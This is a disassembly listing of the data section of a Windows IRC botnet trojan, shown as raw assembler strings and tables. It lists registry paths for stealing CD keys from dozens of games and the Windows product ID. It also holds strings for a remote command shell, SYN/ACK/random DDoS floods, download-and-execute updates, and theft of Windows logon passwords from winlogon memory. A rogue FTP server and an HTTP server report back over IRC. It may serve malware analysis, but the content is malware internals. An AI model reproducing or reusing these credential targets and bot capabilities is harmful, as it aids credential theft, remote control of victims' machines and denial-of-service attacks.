dd 80000001h, 436D80h, 436DA8h, 436DB4h, 2 dup(0)
dd 80000001h, 436DC4h, 436DE4h, 436DE8h, 2 dup(0)
dd 80000001h, 436DFCh, 436E20h, 436E24h, 2 dup(0)
dd 80000001h, 436E30h, 436E54h, 436E5Ch, 2 dup(0)
dd 80000001h, 436E70h, 436E84h, 436E94h, 2 dup(0)
dd 80000001h, 436EB0h, 436EF4h, 436EFCh, 2 dup(0)
dd 80000002h, 436F10h, 436F3Ch, 436F48h, 2 dup(0)
dd 80000002h, 436F68h, 436F9Ch, 436FA4h, 2 dup(0)
dd 80000002h, 436FBCh, 436FF0h, 436FF8h, 2 dup(0)
dd 80000002h, 437010h, 437028h, 437030h, 2 dup(0)
dd 80000002h, 437048h, 449C80h, 437084h, 2 dup(0)
dd 80000002h, 437094h, 449C84h, 4370CCh, 2 dup(0)
dd 80000002h, 4370E0h, 449C88h, 43712Ch, 2 dup(0)
dd 80000002h, 43714Ch, 449C8Ch, 43719Ch, 2 dup(0)
dd 80000002h, 4371C8h, 449C90h, 437204h, 2 dup(0)
dd 80000002h, 437218h, 449C94h, 437250h, 2 dup(0)
dd 80000002h, 437260h, 449C98h, 4372B0h, 2 dup(0)
dd 80000002h, 4372DCh, 449C9Ch, 43731Ch, 2 dup(0)
dd 80000002h, 437338h, 449CA0h, 437368h, 2 dup(0)
dd 80000002h, 437388h, 449CA4h, 4373C4h, 2 dup(0)
dd 80000002h, 4373D8h, 449CA8h, 437420h, 2 dup(0)
dd 80000002h, 437440h, 449CACh, 437494h, 2 dup(0)
dd 80000002h, 4374C4h, 449CB0h, 437514h, 2 dup(0)
dd 80000002h, 437540h, 437580h, 437588h, 2 dup(0)
dd 80000002h, 4375A8h, 449CB4h, 4375ECh, 2 dup(0)
dd 80000002h, 437608h, 449CB8h, 437654h, 2 dup(0)
dd 80000002h, 437678h, 449CBCh, 4376ACh, 2 dup(0)
dd 80000002h, 4376B8h, 449CC0h, 4376ECh, 2 dup(0)
dd 80000002h, 4376F8h, 449CC4h, 43772Ch, 2 dup(0)
dd 80000002h, 437738h, 449CC8h, 43776Ch, 2 dup(0)
dd 80000002h, 437778h, 449CCCh, 4377B4h, 2 dup(0)
dd 80000002h, 4377C8h, 449CD0h, 437804h, 2 dup(0)
dd 80000002h, 437818h, 437848h, 437850h, 2 dup(0)
dd 80000002h, 43786Ch, 43788Ch, 437894h, 2 dup(0)
dd 80000002h, 4378B8h, 4378D4h, 4378DCh, 2 dup(0)
dd 80000002h, 4378FCh, 43791Ch, 437924h, 2 dup(0)
dd 80000002h, 437948h, 437960h, 437968h, 2 dup(0)
dd 80000002h, 43796Ch, 437988h, 437998h, 2 dup(0)
dd 80000002h, 4379A0h, 4379D4h, 4379D8h, 2 dup(0)
dd 80000002h, 4379F0h, 437A2Ch, 437A38h, 437A60h, 437A70h
dd 80000002h, 437A84h, 437AA8h, 437AB4h, 437AC8h, 437AD8h
dd 80000002h, 437AE0h, 437B04h, 437B10h, 437B3Ch, 437B4Ch
dd 80000002h, 437B54h, 437B78h, 437B84h, 437BB4h, 437BC4h
dd 6 dup(0)
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: .data:off_436904�o
align 10h
aCdkey db 'CDKey',0 ; DATA XREF: .data:00436908�o
align 4
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: .data:0043690C�o
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 4
aRegnumber db 'RegNumber',0
align 4
aTheGladiators db 'The Gladiators',0
align 4
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aKey_0 db 'Key',0
aGunmanChronicl db 'Gunman Chronicles',0
align 4
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 10h
aKey_1 db 'Key',0
aHalfLife db 'Half-Life',0
align 10h
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aPrvkey db 'prvkey',0
align 4
aIndustryGiant2 db 'Industry Giant 2',0
align 10h
aSoftware3d0Sta db 'Software\3d0\Status',0
aCustomernumber db 'CustomerNumber',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 10h
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aCdkey_0 db 'CDKey',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion',0
align 4
aProductid db 'ProductId',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aSoftwareUnreal db 'Software\Unreal Technology\Installed Apps\UT2003',0
align 4
aCdkey_1 db 'CDKey',0
align 4
aUnrealTourname db 'Unreal Tournament 2003',0
align 4
aSoftwareUnre_0 db 'Software\Unreal Technology\Installed Apps\UT2004',0
align 10h
aCdkey_2 db 'CDKey',0
align 4
aUnrealTourna_0 db 'Unreal Tournament 2004',0
align 10h
aSoftwareIgi2Re db 'Software\IGI 2 Retail',0
align 4
aCdkey_3 db 'CDKey',0
align 10h
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
aSoftwareElectr db 'Software\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aFreedomForce db 'Freedom Force',0
align 4
aSoftwareElec_0 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aBattlefield194 db 'Battlefield 1942',0
align 10h
aSoftwareElec_1 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Ro'
db 'me\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
aSoftwareElec_2 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons'
db ' of WWII\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 4
aSoftwareElec_3 db 'Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 4
aBattlefieldVie db 'Battlefield Vietnam',0
aSoftwareElec_4 db 'Software\Electronic Arts\EA GAMES\Black and White\ergc',0
align 10h
aBlackAndWhite db 'Black and White',0
aSoftwareElec_5 db 'Software\Electronic Arts\EA GAMES\Command and Conquer Generals Ze'
db 'ro Hour\ergc',0
align 10h
aCommandAndConq db 'Command and Conquer: Generals (Zero Hour)',0
align 4
aSoftwareElec_6 db 'Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 4
aSoftwareElec_7 db 'Software\Electronic Arts\EA GAMES\Generals\ergc',0
aCommandAndCo_0 db 'Command and Conquer: Generals',0
align 4
aSoftwareElec_8 db 'Software\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 4
aGlobalOperatio db 'Global Operations',0
align 4
aSoftwareElec_9 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\e'
db 'rgc',0
align 10h
aMedalOfHonorAl db 'Medal of Honor: Allied Assault',0
align 10h
aSoftwareEle_10 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault B'
db 'reakthrough\ergc',0
align 4
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 4
aSoftwareEle_11 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault S'
db 'pearhead\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault: Spearhead',0
align 10h
aSoftwareEle_12 db 'Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 10h
aErgc db 'ergc',0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 4
aSoftwareEle_13 db 'Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc'
db 0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
aSoftwareEle_14 db 'Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edit'
db 'ion\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 4
aSoftwareEle_15 db 'Software\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 4
aSoftwareEle_16 db 'Software\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 4
aSoftwareEle_17 db 'Software\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 4
aSoftwareEle_18 db 'Software\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 4
aSoftwareEle_19 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNascarRacing20 db 'Nascar Racing 2002',0
align 4
aSoftwareEle_20 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2003',0
align 4
aSoftwareRedSto db 'Software\Red Storm Entertainment\RAVENSHIELD',0
align 4
aCdkey_4 db 'CDKey',0
align 10h
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
aSoftwareWestwo db 'Software\Westwood\Tiberian Sun',0
align 4
aSerial db 'Serial',0
align 4
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 4
aSoftwareWest_0 db 'Software\Westwood\Red Alert',0
aSerial_0 db 'Serial',0
align 4
aCommandAndCo_2 db 'Command and Conquer: Red Alert',0
align 4
aSoftwareWest_1 db 'Software\Westwood\Red Alert 2',0
align 4
aSerial_1 db 'Serial',0
align 4
aCommandAndCo_3 db 'Command and Conquer: Red Alert 2',0
align 4
aSoftwareWest_2 db 'Software\Westwood\NOX',0
align 10h
aSerial_2 db 'Serial',0
align 4
aNox db 'NOX',0
aSoftwareTechla db 'Software\Techland\Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
aChrome db 'Chrome',0
align 10h
aSoftwareIllusi db 'Software\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aKey_2 db 'key',0
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 10h
aSoftwareActivi db 'Software\Activision\Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 10h
aBaseMpSof2key db 'base\mp\sof2key',0
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 4
aLocation db 'Location',0
align 4
aNeverwinterNig db 'Neverwinter Nights',0
align 4
aNwncdkey_ini db 'nwncdkey.ini',0
align 4
aKey1 db 'Key1=',0
align 10h
aSoftwareBiow_0 db 'Software\BioWare\NWN\Neverwinter',0
align 4
aLocation_0 db 'Location',0
align 10h
aNeverwinterN_0 db 'Neverwinter Nights (Shadows of Undrentide)',0
align 4
aNwncdkey_ini_0 db 'nwncdkey.ini',0
align 4
aKey2 db 'Key2=',0
align 4
aSoftwareBiow_1 db 'Software\BioWare\NWN\Neverwinter',0
align 4
aLocation_1 db 'Location',0
align 4
aNeverwinterN_1 db 'Neverwinter Nights (Hordes of the Underdark)',0
align 4
aNwncdkey_ini_1 db 'nwncdkey.ini',0
align 4
aKey3 db 'Key3=',0
align 4
aSS db '%s\%s',0 ; DATA XREF: sub_403FBB+79�o
align 4
aR: ; DATA XREF: sub_403FBB+8A�o
unicode 0, <r>,0
asc_437BD8: ; DATA XREF: sub_403FBB+DE�o
unicode 0, <=>,0
asc_437BDC: ; DATA XREF: sub_403FBB+E9�o
unicode 0, <=>,0
aSCdKeyS_ db '%s CD Key: (%s).',0 ; DATA XREF: sub_403FBB+FE�o
align 4
aSCdKeyS__0 db '%s CD Key: (%s).',0 ; DATA XREF: sub_403FBB+11B�o
align 4
aSCdKeyS__1 db '%s CD Key: (%s).',0 ; DATA XREF: sub_403FBB+167�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4041AA+B�o
align 10h
aDccFailedToOpe db '[DCC]: Failed to open socket.',0 ; DATA XREF: sub_40449C+47�o
align 10h
aDccFailedToO_0 db '[DCC]: Failed to open remote command shell.',0
; DATA XREF: sub_40449C+AB�o
asc_437C6C: ; DATA XREF: sub_40449C+138�o
dw 0Ah
unicode 0, <>,0
aDccFailedToSen db '[DCC]: Failed to send to Remote command shell.',0
; DATA XREF: sub_40449C+170�o
align 10h
aDccFailedToCre db '[DCC]: Failed to create socket.',0 ; DATA XREF: sub_40465D+44�o
aDccFailedToBin db '[DCC]: Failed to bind to socket.',0 ; DATA XREF: sub_40465D+82�o
align 4
aDccFailedToO_1 db '[DCC]: Failed to open socket.',0 ; DATA XREF: sub_40465D+FD�o
align 4
aDccFileDoesnTE db '[DCC]: File doesn',27h,'t exist.',0 ; DATA XREF: sub_40465D+127�o
align 10h
dword_437D20 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_40465D+16A�o
dd 169h
aDccSendTimeout db '[DCC]: Send timeout.',0 ; DATA XREF: sub_40465D+1CB�o
align 10h
aDccUnableToOpe db '[DCC]: Unable to open socket.',0 ; DATA XREF: sub_40465D+202�o
align 10h
aDccSocketError db '[DCC]: Socket error.',0 ; DATA XREF: sub_40465D+36B�o
align 4
aDccSocketErr_0 db '[DCC]: Socket error.',0 ; DATA XREF: sub_40465D+37C�o
align 10h
aDccTransferCom db '[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).',0
; DATA XREF: sub_40465D+2FA�o
align 10h
aSS_0 db '%s%s',0 ; DATA XREF: sub_404A02+54�o
align 4
aDccErrorUnable db '[DCC]: Error unable to write file to disk.',0
; DATA XREF: sub_404A02+83�o
align 4
aAB db 'a+b',0 ; DATA XREF: sub_404A02+97�o
aDccErrorOpenin db '[DCC]: Error opening file for writing.',0 ; DATA XREF: sub_404A02+AB�o
align 10h
aDccErrorOpen_0 db '[DCC]: Error opening socket.',0 ; DATA XREF: sub_404A02+CB�o
align 10h
aDccSocketErr_1 db '[DCC]: Socket error.',0 ; DATA XREF: sub_404A02+156�o
align 4
aDccTransferC_0 db '[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).',0
; DATA XREF: sub_404A02+1CF�o
align 4
aDdosDoneWithFl db '[DDoS]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_404C3D+5B�o
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_404CEF+F1�o
align 4
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_404CEF:loc_404DFF�o
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_404CEF:loc_404E1B�o
aDdosSendErrorD db '[DDoS]: Send error: <%d>.',0 ; DATA XREF: sub_404CEF+302�o
align 4
aDownloadCouldn db '[DOWNLOAD]: Couldn',27h,'t open file: %s.',0 ; DATA XREF: sub_405084+77�o
aDownloadFileDo db '[DOWNLOAD]: File download: %s (%dKB transferred).',0
; DATA XREF: sub_405084+183�o
align 4
aDownloadUpdate db '[DOWNLOAD]: Update: %s (%dKB transferred).',0
; DATA XREF: sub_405084+195�o
align 10h
aDownloadFilesi db '[DOWNLOAD]: Filesize is incorrect: (%d != %d).',0
; DATA XREF: sub_405084+1D8�o
align 10h
aDownloadCrcFai db '[DOWNLOAD]: CRC Failed (%d != %d).',0 ; DATA XREF: sub_405084+262�o
align 4
aDownloadDownlo db '[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.',0
; DATA XREF: sub_405084+2E1�o
aOpen db 'open',0 ; DATA XREF: sub_405084+336�o
align 10h
aDownloadOpened db '[DOWNLOAD]: Opened: %s.',0 ; DATA XREF: sub_405084+358�o
aDownloadDown_0 db '[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
; DATA XREF: sub_405084+3C9�o
aDownloadUpda_0 db '[DOWNLOAD]: Update failed: Error executing file: %s.',0
; DATA XREF: sub_405084+485�o
align 4
aDownloadBadUrl db '[DOWNLOAD]: Bad URL, or DNS Error: %s.',0 ; DATA XREF: sub_405084+493�o
align 4
aUnknown db 'Unknown',0 ; DATA XREF: sub_40562C:loc_40566F�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_40562C:loc_405669�o
aDisk db 'Disk',0 ; DATA XREF: sub_40562C:loc_405663�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_40562C:loc_40565D�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_40562C:loc_405657�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_40562C:loc_405651�o
a?: ; DATA XREF: sub_40562C+1F�o
unicode 0, <?>,0
aFailed db 'failed',0 ; DATA XREF: sub_4056BD+E0�o
align 4
aFailed_0 db 'failed',0 ; DATA XREF: sub_4056BD+F1�o
align 4
aFailed_1 db 'failed',0 ; DATA XREF: sub_4056BD+102�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_4056BD+70�o
align 4
aSkb_0 db '%sKB',0 ; DATA XREF: sub_4056BD+9B�o
align 4
aSkb_1 db '%sKB',0 ; DATA XREF: sub_4056BD+C6�o
align 4
aFailed_2 db 'failed',0 ; DATA XREF: sub_4057E1+3B�o
align 4
aMainSDriveSFai db '[MAIN]: %s Drive (%s): Failed to stat, device not ready.',0
; DATA XREF: sub_4057E1+58�o
align 4
aMainSDriveSSTo db '[MAIN]: %s Drive (%s): %s total, %s free, %s available.',0
; DATA XREF: sub_4057E1+8E�o
aA db 'A:\',0 ; DATA XREF: sub_4058B3:loc_4058F8�o
aFindfileSearch db '[FINDFILE]: Searching for file: %s.',0 ; DATA XREF: sub_405A20+5C�o
aFindfileFilesF db '[FINDFILE]: Files found: %d.',0 ; DATA XREF: sub_405A20+C5�o
align 4
aS_1 db '%s\*',0 ; DATA XREF: sub_405B38+1A�o
align 10h
aSS_1 db '%s\%s',0 ; DATA XREF: sub_405B38+7A�o
align 4
aSS_2 db '%s\%s',0 ; DATA XREF: sub_405B38+CE�o
align 10h
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_405B38+107�o
align 10h
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_405C86+40�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_405C86+55�o
align 10h
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_405C86+68�o
align 4
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_405C86+73�o
align 4
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_405C86+80�o
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_405C86+8D�o
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_405C86+9A�o
align 10h
aUsername: ; DATA XREF: sub_405C86+CE�o
unicode 0, <USERNAME>,0
align 4
aUserdomain: ; DATA XREF: sub_405C86+DC�o
unicode 0, <USERDOMAIN>,0
align 4
aFindpassTheWin db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_405C86+117�o
db ' \\%S, User: (%S/(no password)).',0
align 10h
aFindpassUnable db '[FINDPASS]: Unable to find the password in memory.',0
; DATA XREF: sub_405C86:loc_405DCB�o
align 4
aFindpassUnab_0 db '[FINDPASS]: Unable to find Winlogon Process ID.',0
; DATA XREF: sub_405C86:loc_405DD2�o
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_405C86+161�o
align 4
aFindpassFailed db '[FINDPASS]: Failed to enable Debug Privilege.',0
; DATA XREF: sub_405C86:loc_405DFF�o
align 4
aFindpassOnlySu db '[FINDPASS]: Only supported on Windows NT/2000.',0
; DATA XREF: sub_405C86+35�o
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_405E58+AF�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_405E58+123�o
align 4
aMsgina db 'MSGINA',0 ; DATA XREF: sub_405E58+13E�o
align 4
aFindpassTheW_0 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_4062BE+70�o
db ' \\%S, User: (%S/%S).',0
align 4
aFindpassTheW_1 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_406355+C7�o
db ' \\%S, User: (%S/%S).',0
align 4
aFindpassTheW_2 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_406355+E1�o
db ' \\%S, User: (%S/(N/A)).',0
align 10h
dword_438570 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_4064A6+A4�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4385BC dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_4064A6+E3�o
dword_4385D8 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_4064A6+118�o
dword_4385EC dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_4064A6+13F�o
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_406614+1E6�o
align 4
aSS_3 db '%s %s',0 ; DATA XREF: sub_406614+26E�o
align 10h
aUser db 'USER',0 ; DATA XREF: sub_406614+27F�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_406614+294�o
align 10h
aPass db 'PASS',0 ; DATA XREF: sub_406614+2A4�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_406614+2B8�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: sub_406614+2C8�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_406614+2DC�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_406614+2EC�o
align 10h
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_406614+300�o
align 4
off_438694 dd offset dword_445750 ; DATA XREF: sub_406614+310�o
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_406614+324�o
align 4
aType db 'TYPE',0 ; DATA XREF: sub_406614+334�o
align 10h
aA_0: ; DATA XREF: sub_406614+34B�o
unicode 0, <A>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_406614+35F�o
aType_0 db 'TYPE',0 ; DATA XREF: sub_406614+36F�o
align 10h
aI: ; DATA XREF: sub_406614+386�o
unicode 0, <I>,0
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_406614+39A�o
aPasv db 'PASV',0 ; DATA XREF: sub_406614+3AA�o
align 10h
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_406614+3BD�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_406614+3F8�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_406614+40B�o
align 4
aPort db 'PORT',0 ; DATA XREF: sub_406614+439�o
align 4
aS_2 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_406614+472�o
db ']',0
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_406614+4B6�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_406614+4E9�o
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_406614+4FA�o
align 10h
aRetr db 'RETR',0 ; DATA XREF: sub_406614+50A�o
align 4
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_406614+522�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_406614+54E�o
aFtpFileTransfe db '[FTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_406614+567�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_406614+5B2�o
align 10h
aQuit db 'QUIT',0 ; DATA XREF: sub_406614+5BF�o
align 4
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_406614+5D3�o
aRb_0 db 'rb',0 ; DATA XREF: sub_406C9A+24�o
align 4
aGet db 'GET ',0 ; DATA XREF: sub_406D34+26F�o
align 10h
asc_438880: ; DATA XREF: sub_406D34+292�o
unicode 0, < >,0
asc_438884: ; DATA XREF: sub_406D34+297�o
unicode 0, < >,0
aGet_0 db 'GET ',0 ; DATA XREF: sub_406D34+2A2�o
align 10h
asc_438890 db 0Dh,0Ah,0 ; DATA XREF: sub_406D34+2D5�o
align 4
aHttpdErrorServ db '[HTTPD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_406D34+3FE�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_407195+5E�o
align 10h
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_407195:loc_4071FA�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_407195+83�o
align 10h
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_407195+97�o
align 4
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_407195+D3�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_407195+F6�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aS_3 db '\%s',0 ; DATA XREF: sub_407317+2F�o
aS_4 db '%s',0 ; DATA XREF: sub_407317+3A�o
align 10h
aSS_4 db '%s%s',0 ; DATA XREF: sub_407317+EA�o
align 4
asc_438AE8: ; DATA XREF: sub_407317+FB�o
dw 0Ah
unicode 0, <>,0
asc_438AEC: ; DATA XREF: sub_407317+157�o
unicode 0, <*>,0
aHttpdWorkerThr db '[HTTPD]: Worker thread of server thread: %d.',0
; DATA XREF: sub_407317+20B�o
align 10h
aHttpdFailedT_0 db '[HTTPD]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_407317+28F�o
align 4
asc_438B58: ; DATA XREF: sub_4075C7+29�o
dw 0Ah
unicode 0, <>,0
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4075C7+4B�o
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_4075C7+78�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_4075C7+AD�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_4075C7+F7�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_4075C7+12B�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4075C7+147�o
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_4075C7+1C0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
a__ db '..',0 ; DATA XREF: sub_4075C7+232�o
align 4
a_: ; DATA XREF: sub_4075C7+24D�o
unicode 0, <.>,0
aPm db 'PM',0 ; DATA XREF: sub_4075C7+285�o
align 4
aAm db 'AM',0 ; DATA XREF: sub_4075C7+290�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_4075C7+2BA�o
aS_5 db '<%s>',0 ; DATA XREF: sub_4075C7+2E4�o
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_4075C7+30E�o
align 4
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_4075C7+330�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aSS_5 db '%s%s/',0 ; DATA XREF: sub_4075C7+374�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_4075C7+3BB�o
align 4
